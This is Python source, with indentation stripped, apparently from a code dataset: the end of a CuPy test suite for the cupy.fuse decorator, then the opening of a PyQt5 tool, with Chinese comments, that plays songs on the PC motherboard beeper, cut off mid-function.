return err0 is not None, (arrs0, arrs1)
def check_reduce(self, func, n, reduce_f, gen, args=None):
if args is None:
args = ((),) * n
self._check_reduce(func, n, reduce_f, gen, args)
def _check_reduce(self, func, n, reduce_f, gen, args):
@cupy.fuse()
def f(*args):
return reduce_f(func(*args))
data = [gen(*a) for a in args]
ret0 = reduce_f(func(*data)) # Non-fused
ret1 = f(*data) # Fused
numpy.testing.assert_array_almost_equal(ret0.get(), ret1.get())
def test_setitem_ellipsis(self):
def func(x, y):
y[...] = x
return y
ret = self._check(
func, 2, self.random_int, ((2, 3),) * 2,
error_types=(TypeError,))
is_err, (arrs_n, arrs_f) = ret
if not is_err:
# The returned array must equal to z
ret, x, y = arrs_f
testing.assert_array_equal(x, ret)
testing.assert_array_equal(x, y)
def test_setitem_none_slice(self):
def func(x, y):
y[:] = x
return y
ret = self._check(
func, 2, self.random_int, ((2, 3),) * 2,
error_types=(TypeError,))
is_err, (arrs_n, arrs_f) = ret
if not is_err:
# The returned array must equal to z
ret, x, y = arrs_f
testing.assert_array_equal(x, ret)
testing.assert_array_equal(x, y)
@testing.for_all_dtypes_combination(
names=['src_dtype', 'dst_dtype'], full=True, no_complex=True)
def test_out_arg(self, src_dtype, dst_dtype):
def func(x, y, z):
return cupy.add(x, y, out=z)
dtypes = (src_dtype, src_dtype, dst_dtype)
ret = self._check(
func, 3,
lambda iarg: cupy.arange(6).astype(dtypes[iarg]).reshape((2, 3)),
[(_,) for _ in range(3)],
error_types=(TypeError,))
is_err, (arrs_n, arrs_f) = ret
if not is_err:
# The returned array must equal to z
arr_ret = arrs_f[0]
arr_z = arrs_f[3]
testing.assert_array_equal(arr_ret, arr_z)
def test_out_arg2(self):
def func(x, y, z, u, v):
cupy.add(x, y, out=z)
cupy.subtract(z, x, out=u)
cupy.multiply(z, x, out=v)
return u
ret = self._check(
func, 5, self.random_int, ((),) * 5,
error_types=(TypeError,))
is_err, (arrs_n, arrs_f) = ret
# Must succeed
self.assertFalse(is_err)
# The returned array must equal to u
arr_ret = arrs_f[0]
arr_u = arrs_f[4]
testing.assert_array_equal(arr_ret, arr_u)
def test_bitwise(self):
self.check(cupy.bitwise_and, 2, self.random_int)
self.check(cupy.bitwise_or, 2, self.random_int)
self.check(cupy.bitwise_xor, 2, self.random_int)
self.check(cupy.invert, 1, self.random_int)
self.check(cupy.left_shift, 2, self.random_int, ((0, 20),) * 2)
self.check(cupy.right_shift, 2, self.random_int, ((0, 20),) * 2)
def test_compare(self):
self.check(cupy.greater, 2, self.random_int)
self.check(cupy.greater_equal, 2, self.random_int)
self.check(cupy.less, 2, self.random_int)
self.check(cupy.less_equal, 2, self.random_int)
self.check(cupy.equal, 2, self.random_int)
self.check(cupy.not_equal, 2, self.random_int)
def test_logic_content(self):
self.check(cupy.isfinite, 1, self.random_real)
self.check(cupy.isinf, 1, self.random_real)
self.check(cupy.isnan, 1, self.random_real)
def test_logic_ops(self):
self.check(cupy.logical_and, 2, self.random_int, ((0, 2),) * 2)
self.check(cupy.logical_or, 2, self.random_int, ((0, 2),) * 2)
self.check(cupy.logical_not, 1, self.random_int, ((0, 2),))
self.check(cupy.logical_xor, 2, self.random_int, ((0, 2),) * 2)
def test_trigonometric(self):
self.check(cupy.sin, 1, self.random_real)
self.check(cupy.cos, 1, self.random_real)
self.check(cupy.tan, 1, self.random_real)
self.check(cupy.arcsin, 1, self.random_real, ((-1, 1),))
self.check(cupy.arccos, 1, self.random_real, ((-1, 1),))
self.check(cupy.arctan, 1, self.random_real)
self.check(cupy.hypot, 2, self.random_real)
self.check(cupy.deg2rad, 1, self.random_real)
self.check(cupy.rad2deg, 1, self.random_real)
self.check(cupy.degrees, 1, self.random_real)
self.check(cupy.radians, 1, self.random_real)
def test_hyperbolic(self):
self.check(cupy.sinh, 1, self.random_real, ((-10, 10),))
self.check(cupy.cosh, 1, self.random_real, ((-10, 10),))
self.check(cupy.tanh, 1, self.random_real, ((-10, 10),))
self.check(cupy.arcsinh, 1, self.random_real, ((-10, 10),))
self.check(cupy.arccosh, 1, self.random_real, ((1, 10),))
self.check(cupy.arctanh, 1, self.random_real, ((0, 1),))
def test_rounding(self):
self.check(cupy.rint, 1, self.random_real)
self.check(cupy.floor, 1, self.random_real)
self.check(cupy.ceil, 1, self.random_real)
self.check(cupy.trunc, 1, self.random_real)
def test_explog(self):
self.check(cupy.exp, 1, self.random_real, ((-10, 10),))
self.check(cupy.expm1, 1, self.random_real, ((-10, 10),))
self.check(cupy.exp2, 1, self.random_real, ((-10, 10),))
self.check(cupy.log, 1, self.random_real, ((0, 10),))
self.check(cupy.log10, 1, self.random_real, ((0, 10),))
self.check(cupy.log2, 1, self.random_real, ((0, 10),))
self.check(cupy.log1p, 1, self.random_real, ((-1, 10),))
self.check(cupy.logaddexp, 2, self.random_real, ((0, 10),) * 2)
self.check(cupy.logaddexp2, 2, self.random_real, ((0, 10),) * 2)
def test_special_func(self):
self.check(cupy.i0, 1, self.random_real)
self.check(cupy.sinc, 1, self.random_real)
def test_floating(self):
self.check(cupy.signbit, 1, self.random_real)
self.check(cupy.copysign, 2, self.random_real)
self.check(cupy.ldexp, 2, self.random_int, ((1, 10),) * 2)
self.check(cupy.frexp, 1, self.random_real, ((1, 1000),))
self.check(cupy.nextafter, 2, self.random_real)
def test_arithmetic(self):
self.check(cupy.add, 2, self.random_real)
self.check(cupy.reciprocal, 1, self.random_real)
self.check(cupy.negative, 1, self.random_real)
self.check(cupy.angle, 1, self.random_imag)
self.check(cupy.conj, 1, self.random_imag)
self.check(cupy.real, 1, self.random_imag)
self.check(cupy.imag, 1, self.random_imag)
self.check(cupy.multiply, 2, self.random_real)
self.check(cupy.divide, 2, self.random_real)
self.check(cupy.power, 2, self.random_real, ((0, 10),) * 2)
self.check(cupy.subtract, 2, self.random_real)
self.check(cupy.true_divide, 2, self.random_int, ((1, 1000),) * 2)
self.check(cupy.floor_divide, 2, self.random_real, ((1, 1000),) * 2)
self.check(cupy.fmod, 2, self.random_real)
self.check(cupy.mod, 2, self.random_int, ((1, 1000),) * 2)
self.check(cupy.modf, 1, self.random_real)
self.check(cupy.remainder, 2, self.random_int, ((1, 1000),) * 2)
@testing.with_requires('numpy>=1.13')
def test_divmod(self):
self.check(cupy.divmod, 2, self.random_real)
def test_misc(self):
self.check(cupy.sqrt, 1, self.random_real, ((0, 1000),))
self.check(cupy.cbrt, 1, self.random_real, ((0, 1000),))
self.check(cupy.square, 1, self.random_real)
self.check(cupy.absolute, 1, self.random_real)
self.check(cupy.abs, 1, self.random_real)
self.check(cupy.sign, 1, self.random_real)
self.check(cupy.maximum, 2, self.random_real)
self.check(cupy.minimum, 2, self.random_real)
self.check(cupy.fmax, 2, self.random_real)
self.check(cupy.fmin, 2, self.random_real)
def test_special(self):
self.check(cupy.where, 3,
(self.random_bool,
lambda *args: self.random_int(*args, seed=0),
lambda *args: self.random_int(*args, seed=1)),
((), (0, 100), (0, 100)))
self.check(cupy.clip, 3,
(lambda *args: self.random_real(*args, seed=0),
lambda *args: self.random_real(*args, seed=1),
lambda *args: self.random_real(*args, seed=2)),
((0, 1000), (0, 500), (500, 1000)))
self.check(cupy.around, 2,
(self.random_bool,
self.random_int,
self.random_real))
def test_reduce(self):
self.check_reduce(cupy.bitwise_and, 2, cupy.sum, self.random_int)
self.check_reduce(cupy.sqrt, 1, cupy.prod, self.random_int, ((1, 2),))
self.check_reduce(cupy.sqrt, 1, cupy.prod, self.random_real, ((1, 2),))
self.check_reduce(lambda x: x, 1, cupy.amax, self.random_int)
self.check_reduce(lambda x: x, 1, cupy.amin, self.random_int)
@testing.gpu
class TestFusionMisc(unittest.TestCase):
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose(atol=1e-5)
def check_unary(self, name, xp, dtype, no_bool=False):
if no_bool and numpy.dtype(dtype).char == '?':
return numpy.int_(0)
a = testing.shaped_arange((2, 3), xp, dtype)
@cupy.fuse()
def g(x):
return getattr(xp, name)(x)
return g(a)
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose(atol=1e-5)
def check_binary(self, name, xp, dtype, no_bool=False):
if no_bool and numpy.dtype(dtype).char == '?':
return numpy.int_(0)
a = testing.shaped_arange((2, 3), xp, dtype)
b = testing.shaped_reverse_arange((2, 3), xp, dtype)
@cupy.fuse()
def g(x, y):
return getattr(xp, name)(x, y)
return g(a, b)
@testing.for_dtypes(['?', 'b', 'h', 'i', 'q', 'e', 'f', 'd'])
@testing.numpy_cupy_allclose(atol=1e-5)
def check_unary_negative(self, name, xp, dtype, no_bool=False):
if no_bool and numpy.dtype(dtype).char == '?':
return numpy.int_(0)
a = xp.array([-3, -2, -1, 1, 2, 3], dtype=dtype)
@cupy.fuse()
def g(x):
return getattr(xp, name)(x)
return g(a)
@testing.for_float_dtypes()
@testing.numpy_cupy_array_equal()
@fusion_default_array_equal()
def check_binary_nan(self, name, xp, dtype):
a = xp.array([-3, numpy.NAN, -1, numpy.NAN, 0, numpy.NAN, 2],
dtype=dtype)
b = xp.array([numpy.NAN, numpy.NAN, 1, 0, numpy.NAN, -1, -2],
dtype=dtype)
return a, b
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_array_equal()
def test_external_clip(self, xp, dtype):
a = testing.shaped_arange((2, 3, 4), xp, dtype)
@cupy.fuse()
def g(x, y, z):
return xp.clip(x, y, z)
ty = numpy.dtype(dtype).type
return g(a, ty(3), ty(13))
@testing.with_requires('numpy>=1.11.2')
def test_sqrt(self):
# numpy.sqrt is broken in numpy<1.11.2
self.check_unary('sqrt')
@testing.with_requires('numpy>=1.10')
def test_cbrt(self):
self.check_unary('cbrt')
def test_square(self):
self.check_unary('square')
def test_absolute(self):
self.check_unary('absolute')
def test_absolute_negative(self):
self.check_unary_negative('absolute')
def test_sign(self):
self.check_unary('sign', no_bool=True)
def test_sign_negative(self):
self.check_unary_negative('sign', no_bool=True)
def test_maximum(self):
self.check_binary('maximum')
def test_maximum_nan(self):
self.check_binary_nan('maximum')
def test_minimum(self):
self.check_binary('minimum')
def test_minimum_nan(self):
self.check_binary_nan('minimum')
def test_fmax(self):
self.check_binary('fmax')
def test_fmax_nan(self):
self.check_binary_nan('fmax')
def test_fmin(self):
self.check_binary('fmin')
def test_fmin_nan(self):
self.check_binary_nan('fmin')
@testing.for_all_dtypes_combination(
names=['src_dtype', 'dst_dtype'], no_complex=True)
@testing.numpy_cupy_array_equal()
def test_astype_class(self, xp, src_dtype, dst_dtype):
@cupy.fuse()
def f(x):
return x.astype(dst_dtype)
x = xp.arange(6).astype(src_dtype).reshape(2, 3)
return f(x)
@testing.gpu
class TestFusionFuse(unittest.TestCase):
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_array_equal()
def test_fuse1(self, xp, dtype):
a = xp.array([2, 2, 2, 2, 3, 3, 3, 3], dtype=dtype)
b = xp.array([2, 2, 3, 3, 2, 2, 3, 3], dtype=dtype)
c = xp.array([2, 3, 2, 3, 2, 3, 2, 3], dtype=dtype)
@cupy.fuse()
def g(x, y, z):
w = x * y + z
(x, w) = (w, x)
return z * w + y + x
return g(a, b, c)
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_array_equal()
def test_fuse2(self, xp, dtype):
a = xp.array([2, 2, 2, 2, 3, 3, 3, 3], dtype=dtype)
b = xp.array([2, 2, 3, 3, 2, 2, 3, 3], dtype=dtype)
c = xp.array([2, 3, 2, 3, 2, 3, 2, 3], dtype=dtype)
@cupy.fuse()
def g(x, y, z):
x += z
xp.add(x, y, z)
return z
return g(a, b, c)
@testing.for_all_dtypes(no_bool=True, no_complex=True)
@testing.numpy_cupy_array_equal()
def test_fuse3(self, xp, dtype):
a = xp.array([2, 2, 2, 2, 3, 3, 3, 3], dtype=dtype)
b = xp.array([2, 2, 3, 3, 2, 2, 3, 3], dtype=dtype)
c = xp.array([2, 3, 2, 3, 2, 3, 2, 3], dtype=dtype)
@cupy.fuse()
def g(x, y, z):
x = 10 + (-x) * (x - y) + 10
x = 2 * (100 - x - 30)
x = x / (y + 1 / y)
return z // x + x // z + 100 // x + 100 // z
return g(a, b, c)
@testing.for_int_dtypes()
@testing.numpy_cupy_array_equal()
def test_fuse4(self, xp, dtype):
a = xp.array([2, 2, 2, 2, 3, 3, 3, 3], dtype=dtype)
b = xp.array([2, 2, 3, 3, 2, 2, 3, 3], dtype=dtype)
c = xp.array([2, 3, 2, 3, 2, 3, 2, 3], dtype=dtype)
@cupy.fuse()
def g(x, y, z):
x = x * y % z + 10 % x << x << y >> z
return x + (1 << y) + (1 << z) + (120 >> y) + (120 >> y)
return g(a, b, c)
@testing.for_int_dtypes(no_bool=True)
@testing.numpy_cupy_array_equal()
def test_fuse5(self, xp, dtype):
a = xp.arange(15, dtype=dtype)
b = a * a[::-1]
a = a * 3 + 11
c = (a * b) % 63
@cupy.fuse()
def g(x, y, z):
x = ~(x & y) | (x ^ z) ^ (z | y)
y = 109 & y
z = 109 | z
z = 88 ^ z
return x + y + z
return g(a, b, c)
@testing.for_int_dtypes(no_bool=True)
@testing.numpy_cupy_array_equal()
def test_fuse6(self, xp, dtype):
a = xp.arange(15, dtype=dtype)
b = a * a[::-1]
a = a * 3 + 11
c = (a * b) % 63
@cupy.fuse()
def g(x, y, z):
x = ~(x & y) | (x ^ z) ^ (z | y)
y &= 109
z |= 109
z ^= 88
return x + y + z
return g(a, b, c)
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_array_equal()
def test_fuse7(self, xp, dtype):
a = xp.array([2, 2, 2, 2, 3, 3, 3, 3], dtype=dtype)
b = xp.array([2, 2, 3, 3, 2, 2, 3, 3], dtype=dtype)
c = xp.array([2, 3, 2, 3, 2, 3, 2, 3], dtype=dtype)
def toi(x):
return xp.where(x, 1, 0)
@cupy.fuse()
def g(p, q, r, s, t, u):
x = toi(p == q) + toi(r < s) + toi(t > u)
x += toi(p != r) + toi(q <= t) + toi(s >= u)
return x
return g(a, b, c, a, b, c)
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_array_equal()
def test_fuse8(self, xp, dtype):
a = xp.array([2, 2, 2, 2, 3, 3, 3, 3], dtype=dtype)
b = xp.array([2, 2, 3, 3, 2, 2, 3, 3], dtype=dtype)
c = xp.array([2, 3, 2, 3, 2, 3, 2, 3], dtype=dtype)
def toi(x):
return xp.where(x, 1, 0)
@cupy.fuse()
def g(p, q, r):
x = toi(2 == p) + toi(2 != q) + toi(3 > r)
y = toi(2 < p) + toi(2 >= q) + toi(3 <= r)
return x + y << 3
return g(a, b, c)
@testing.for_all_dtypes(no_bool=True, no_complex=True)
@testing.numpy_cupy_array_equal()
def test_fuse9(self, xp, dtype):
a = xp.array([2, 2, 2, 2, 3, 3, 3, 3], dtype=dtype)
b = xp.array([2, 2, 3, 3, 2, 2, 3, 3], dtype=dtype)
c = xp.array([2, 3, 2, 3, 2, 3, 2, 3], dtype=dtype)
@cupy.fuse()
def g(x, y, z):
x *= y
x += y
x = x / y
z %= y
x += y + z
g(a, b, c)
return a
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_array_equal()
def test_fuse10(self, xp, dtype):
a = xp.array([2, 2, 2, 2, 3, 3, 3, 3], dtype=dtype)
b = xp.array([2, 2, 3, 3, 2, 2, 3, 3], dtype=dtype)
c = xp.array([2, 3, 2, 3, 2, 3, 2, 3], dtype=dtype)
@cupy.fuse()
def g(x, y, z):
a = x
a += y
xp.add(x, y, z)
g(a, b, c)
return c
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_array_equal()
def test_fuse11(self, xp, dtype):
a = xp.array([2, 2, 2, 2, 3, 3, 3, 3], dtype=dtype)
b = xp.array([2, 2, 3, 3, 2, 2, 3, 3], dtype=dtype)
c = xp.array([2, 3, 2, 3, 2, 3, 2, 3], dtype=dtype)
@cupy.fuse()
def g(x, y, z):
a = x
a += y
xp.add(x, y, z)
return y
res = g(a, b, c)
return c + res
# NumPy 1.9 accepts itruediv between integers
@testing.with_requires('numpy>=1.10')
@unittest.skipUnless(six.PY3, 'Only for py3')
@testing.for_int_dtypes()
@testing.numpy_cupy_raises()
def test_fuse_int_itruediv_py3_raises(self, xp, dtype):
a = xp.array(3, dtype=dtype)
b = xp.array(2, dtype=dtype)
@cupy.fuse()
def g(x, y):
x /= y
g(a, b)
@testing.for_all_dtypes(no_bool=True)
@testing.numpy_cupy_array_equal()
def test_different_type_same_ufunc(self, xp, dtype):
a = xp.array([2, 2, 2, 2, 3, 3, 3, 3], dtype=dtype)
b = xp.array([2, 2, 3, 3, 2, 2, 3, 3], dtype=numpy.int32)
c = xp.array([2, 3, 2, 3, 2, 3, 2, 3], dtype=numpy.float32)
@cupy.fuse()
def g(x, y, z):
return (x + y, y + z, z + x)
s, t, u = g(a, b, c)
return s
@unittest.skipUnless(six.PY2, 'Only for py2')
@testing.for_int_dtypes(no_bool=True)
@testing.numpy_cupy_array_equal()
def test_fuse_int_ifloordiv_py2(self, xp, dtype):
a = xp.array(3, dtype=dtype)
b = xp.array(2, dtype=dtype)
@cupy.fuse()
def g(x, y):
x /= y
g(a, b)
return a
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_array_equal()
def test_reduce1(self, xp, dtype):
a = xp.array([[2, 2, 2, 2], [3, 3, 3, 3]], dtype=dtype)
b = xp.array([[2, 2, 3, 3], [2, 2, 3, 3]], dtype=dtype)
c = xp.array([[2, 3, 2, 3], [2, 3, 2, 3]], dtype=dtype)
@cupy.fuse()
def g(x, y, z):
return xp.sum(x * y + z)
return g(a, b, c)
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_array_equal()
def test_reduce2(self, xp, dtype):
a = xp.array([[2, 2, 2, 2], [3, 3, 3, 3]], dtype=dtype)
b = xp.array([[2, 2, 3, 3], [2, 2, 3, 3]], dtype=dtype)
c = xp.array([[2, 3, 2, 3], [2, 3, 2, 3]], dtype=dtype)
@cupy.fuse()
def g(x, y, z):
return xp.sum(x * y + z, axis=0)
return g(a, b, c)
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_array_equal()
def test_reduce3(self, xp, dtype):
a = xp.array([[2, 2, 2, 2], [3, 3, 3, 3]], dtype=dtype)
b = xp.array([[2, 2, 3, 3], [2, 2, 3, 3]], dtype=dtype)
c = xp.array([[2, 3, 2, 3], [2, 3, 2, 3]], dtype=dtype)
@cupy.fuse()
def g(x, y, z):
return xp.sum(x * y + z, axis=1)
return g(a, b, c)
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_array_equal()
def test_reduce4(self, xp, dtype):
a = xp.array([[2, 2, 2, 2], [3, 3, 3, 3]], dtype=dtype)
@cupy.fuse()
def g(x):
return xp.prod(x)
return g(a)
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_array_equal()
def test_reduce5(self, xp, dtype):
a = xp.array([[2, 2, 2, 2], [3, 3, 3, 3]], dtype=dtype)
@cupy.fuse()
def g(x):
return xp.max(x, axis=0)
return g(a)
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_array_equal()
def test_reduce6(self, xp, dtype):
a = xp.array([[2, 2, 2, 2], [3, 3, 3, 3]], dtype=dtype)
@cupy.fuse()
def g(x):
return xp.min(x, axis=0)
return g(a)
@testing.gpu
class TestFusionDecorator(unittest.TestCase):
@testing.numpy_cupy_array_equal()
def test_without_paren(self, xp):
@cupy.fuse
def func_wo_paren(x):
"""Fuse without parentheses"""
return x + x
self.assertEqual(func_wo_paren.__name__, 'func_wo_paren')
self.assertEqual(func_wo_paren.__doc__, 'Fuse without parentheses')
a = xp.array([1])
return func_wo_paren(a)
@testing.numpy_cupy_array_equal()
def test_with_paren(self, xp):
@cupy.fuse()
def func_w_paren(x):
"""Fuse with parentheses"""
return x + x
self.assertEqual(func_w_paren.__name__, 'func_w_paren')
self.assertEqual(func_w_paren.__doc__, 'Fuse with parentheses')
a = xp.array([1])
return func_w_paren(a)
@testing.gpu
class TestFusionKernelName(unittest.TestCase):
def check(self, xp, func, expected_name, is_elementwise):
a = xp.arange(0, 12, dtype='d').reshape(3, 4)
b = xp.arange(5, 17, dtype='d').reshape(3, 4)
c = xp.arange(13, 25, dtype='d').reshape(3, 4)
# Test kernel name (with mock)
if xp is cupy:
target = (
'cupy.core.core.ElementwiseKernel' if is_elementwise
else 'cupy.core.core.ReductionKernel')
with mock.patch(target) as Kernel:
func(a, b, c)
Kernel.assert_called_once()
self.assertEqual(Kernel.call_args[1]['name'], expected_name)
# Test there's no error in computation (without mock)
return func(a, b, c)
@testing.numpy_cupy_allclose(atol=1e-5)
def test_elementwise(self, xp):
def func(a, b, c):
@cupy.fuse()
def func_a1(x, y, z):
return (x + y) * z
return func_a1(a, b, c)
return self.check(xp, func, 'func_a1', True)
@testing.numpy_cupy_allclose(atol=1e-5)
def test_elementwise_with_name(self, xp):
def func(a, b, c):
@cupy.fuse(kernel_name='abc')
def func_a1(x, y, z):
return (x + y) * z
return func_a1(a, b, c)
return self.check(xp, func, 'abc', True)
@testing.numpy_cupy_allclose(atol=1e-5)
def test_reduction_premap(self, xp):
def func(a, b, c):
@cupy.fuse()
def func_a1(x, y, z):
return xp.sum((x + y) * z)
return func_a1(a, b, c)
return self.check(xp, func, 'func_a1', False)
@testing.numpy_cupy_allclose(atol=1e-5)
def test_reduction_postmap(self, xp):
def func(a, b, c):
@cupy.fuse()
def func_a1(x):
return xp.sqrt(xp.sum(x) + 10)
return func_a1(a)
return self.check(xp, func, 'func_a1', False)
@testing.numpy_cupy_allclose(atol=1e-5)
def test_reduction_01(self, xp):
def func(a, b, c):
@cupy.fuse()
def func_a1(x, y, z):
return xp.sqrt(xp.prod(x + y * z, axis=1) + 10)
return func_a1(a, b, c)
return self.check(xp, func, 'func_a1', False)
@testing.numpy_cupy_allclose(atol=1e-5)
def test_reduction_with_name(self, xp):
def func(a, b, c):
@cupy.fuse(kernel_name='abc')
def func_a1(x, y, z):
return xp.sum((x + y) * z)
return func_a1(a, b, c)
return self.check(xp, func, 'abc', False)
@testing.gpu
class TestFusionPythonConstant(unittest.TestCase):
@testing.for_all_dtypes_combination(names=['dtype1', 'dtype2'])
@testing.numpy_cupy_array_equal()
def test_python_scalar(self, xp, dtype1, dtype2):
@cupy.fuse()
def f(x):
return x * numpy.asscalar(dtype2(1))
return f(testing.shaped_arange((1,), xp, dtype1))
@testing.for_all_dtypes_combination(names=['dtype1', 'dtype2'])
@testing.numpy_cupy_array_equal()
def test_numpy_scalar(self, xp, dtype1, dtype2):
@cupy.fuse()
def f(x):
return x * dtype2(1)
return f(testing.shaped_arange((1,), xp, dtype1))
@testing.gpu
class TestFusionReturnsConstantValue(unittest.TestCase):
@testing.for_all_dtypes()
@testing.numpy_cupy_array_equal()
def test_pass(self, xp, dtype):
@cupy.fuse()
def f(x):
pass
x = testing.shaped_arange((3, 3), xp, dtype)
y = f(x)
self.assertEqual(y, None)
return x
@testing.for_all_dtypes(no_bool=True)
@testing.numpy_cupy_array_equal()
def test_no_retval(self, xp, dtype):
@cupy.fuse()
def f(x):
x += 1
x = testing.shaped_arange((3, 3), xp, dtype)
y = f(x)
self.assertEqual(y, None)
return x
@testing.gpu
class TestFusionReturnsTuple(unittest.TestCase):
@testing.for_all_dtypes()
@testing.numpy_cupy_array_list_equal()
def test_empty_tuple(self, xp, dtype):
@cupy.fuse()
def f(x):
return ()
x = testing.shaped_arange((3, 4), xp, dtype)
y = f(x)
self.assertEqual(type(y), tuple)
return y
@testing.for_all_dtypes()
@testing.numpy_cupy_array_list_equal()
def test_singleton_tuple(self, xp, dtype):
@cupy.fuse()
def f(x):
return x * 2,
x = testing.shaped_arange((3, 4), xp, dtype)
y = f(x)
self.assertEqual(type(y), tuple)
return y
@testing.for_all_dtypes()
@testing.numpy_cupy_array_list_equal()
def test_pair_tuple(self, xp, dtype):
@cupy.fuse()
def f(x):
return x * 2, x * 3
x = testing.shaped_arange((3, 4), xp, dtype)
y = f(x)
self.assertEqual(type(y), tuple)
return y
class TestFusionComposition(unittest.TestCase):
@testing.for_all_dtypes(no_bool=True)
@testing.numpy_cupy_array_equal()
def test_composition(self, xp, dtype):
@cupy.fuse()
def f(x, y):
return x - y * 2, x + y
@cupy.fuse()
def g(x, y, z):
a, b = f(x + z, z - x * 3)
c, d = f(x - y, y - z)
return a + b * c - d
@cupy.fuse()
def h(x, y):
a, b = f(x + y * 2, y * 3)
return a - b * g(x - 2, x - 3, -y)
x = testing.shaped_arange((3, 3), xp, dtype)
y = testing.shaped_arange((3, 3), xp, dtype)
return h(x, y)
class TestFusionCompile(unittest.TestCase):
@testing.for_all_dtypes(no_bool=True)
@testing.numpy_cupy_array_equal()
def test_compile_from_dtypes(self, xp, dtype):
@cupy.fuse()
def f(x, y):
return x - y * 2
x = testing.shaped_arange((3, 3), xp, dtype)
y = testing.shaped_arange((3, 3), xp, dtype)
f._compile_from_dtypes(x.dtype, y.dtype)
return f(x, y)
@testing.for_all_dtypes(no_bool=True)
@testing.numpy_cupy_array_equal()
def test_clear_cache(self, xp, dtype):
@cupy.fuse()
def f(x, y):
return x - y * 2
x = testing.shaped_arange((3, 3), xp, dtype)
y = testing.shaped_arange((3, 3), xp, dtype)
f.clear_cache()
return f(x, y)
@testing.gpu
class TestFusionGetArrayModule(unittest.TestCase):
@testing.for_all_dtypes()
@testing.numpy_cupy_array_equal()
def test_get_array_module(self, xp, dtype):
@cupy.fuse()
def f(x):
xp = cupy.get_array_module(x)
return xp.square(x)
x = testing.shaped_arange((3, 4), xp, dtype)
return f(x)
class TestFusionThread(unittest.TestCase):
def test_thread(self):
x = testing.shaped_arange((3, 3), cupy, cupy.int64)
y = testing.shaped_arange((3, 3), cupy, cupy.int64)
out = [None]
@cupy.fuse()
def f(x, y):
return x + y * 2
def _target(x, y):
cupy.cuda.Device(0).use()
out[0] = f(x, y)
t = threading.Thread(target=_target, args=(x, y))
t.daemon = True
t.start()
t.join()
assert (out[0] == f(x, y)).all()
@testing.numpy_cupy_array_equal()
def test_thread_multiple_dtypes(self, xp):
x1 = testing.shaped_arange((3, 3), xp, xp.int64)
y1 = testing.shaped_arange((3, 3), xp, xp.int64)
x2 = x1.astype(xp.float64)
y2 = y1.astype(xp.float64)
threads = [None] * 100
out = [None] * 100
@cupy.fuse()
def f(x, y):
return x + y * 2
def _target(tid, x, y):
if xp is cupy:
xp.cuda.Device(0).use()
out[tid] = f(x, y).astype(xp.int64)
def run_thread(tid):
x, y = (x1, y1) if tid % 2 == 0 else (x2, y2)
t = threading.Thread(target=_target, args=(tid, x, y))
threads[tid] = t
t.daemon = True
t.start()
for tid in six.moves.range(0, 50):
run_thread(tid)
for tid in six.moves.range(0, 50):
threads[tid].join()
for tid in six.moves.range(50, 100):
run_thread(tid)
for tid in six.moves.range(50, 100):
threads[tid].join()
return xp.concatenate(out)
@testing.gpu
class TestBroadcast(unittest.TestCase):
@testing.numpy_cupy_array_equal()
def test_broadcast(self, xp):
@cupy.fuse()
def f(x, y):
x += y
return x
x = testing.shaped_arange((2, 3, 4), xp, xp.int64)
y = testing.shaped_arange((3, 4), xp, xp.int64)
return f(x, y)
@testing.numpy_cupy_raises()
def test_broadcast_datarace(self, xp):
@cupy.fuse()
def f(x, y):
x += y
return x
x = testing.shaped_arange((3, 4), xp, xp.int64)
y = testing.shaped_arange((2, 3, 4), xp, xp.int64)
return f(x, y)
|
computersinger.py
|
'''
Function:
让电脑主板上的蜂鸣器哼歌
Author:
Car
微信公众号:
Car的皮皮
'''
import os
import sys
import time
import threading
from PyQt5.QtGui import *
from PyQt5.QtCore import *
from PyQt5.QtWidgets import *
'''让电脑主板上的蜂鸣器哼歌'''
class ComputerSinger(QWidget):
tool_name = '让电脑主板上的蜂鸣器哼歌'
def __init__(self, parent=None, title='让电脑主板上的蜂鸣器哼歌 —— Car的皮皮', **kwargs):
super(ComputerSinger, self).__init__(parent)
import ctypes
rootdir = os.path.split(os.path.abspath(__file__))[0]
self.rootdir = rootdir
self.setFixedSize(500, 100)
self.setWindowTitle(title)
self.setWindowIcon(QIcon(os.path.join(rootdir, 'resources/icon.ico')))
self.grid = QGridLayout()
# 定义必要的组件
# --label
self.musicfilepath_label = QLabel('音乐简谱路径:')
# --输入框
self.musicfilepath_edit = QLineEdit(
os.path.join(rootdir, 'resources/musicfiles/小幸运')
)
# --按钮
self.choose_button = QPushButton('选择')
self.play_button = QPushButton('播放')
# 布局
self.grid.addWidget(self.musicfilepath_label, 0, 0, 1, 1)
self.grid.addWidget(self.musicfilepath_edit, 0, 1, 1, 4)
self.grid.addWidget(self.choose_button, 1, 3, 1, 1)
self.grid.addWidget(self.play_button, 1, 4, 1, 1)
self.setLayout(self.grid)
# 事件绑定
self.choose_button.clicked.connect(self.openfile)
self.play_button.clicked.connect(
lambda _: threading.Thread(target=self.play).start()
)
# 一些常量
self.pitchs_dict = {'l': 0.5, 'm': 1.0, 'h': 2.0}
self.tone2freq_dict = {
'C': 523,
'D': 587,
'E': 659,
'F': 698,
'G': 784,
'A': 880,
'B': 988,
}
self.tone_scale = 1.06
self.beats = 1000 * 60 / 65
self.beep_player = ctypes.windll.kernel32
'''打开文件'''
def openfile(self):
filepath = QFileDialog.getOpenFileName(self, '请选取音乐简谱', self.rootdir)
self.musicfilepath_edit.setText(filepath[0])
'''解析音乐简谱'''
def parse(self, filepath):
song_info = open(filepath, 'r').read().replace('\n', '').split(',')
tone = song_info[0]
song_info = song_info[1:]
return tone, song_info
'''播放'''
def play(self):
filepath = self.musicfilepath_edit.text()
if not os.path.isfile(filepath):
return
tone, song_info = self.parse(filepath)
do = self.tone2freq_dict[tone]
re = int(do * self.tone_scale * self.tone_scale)
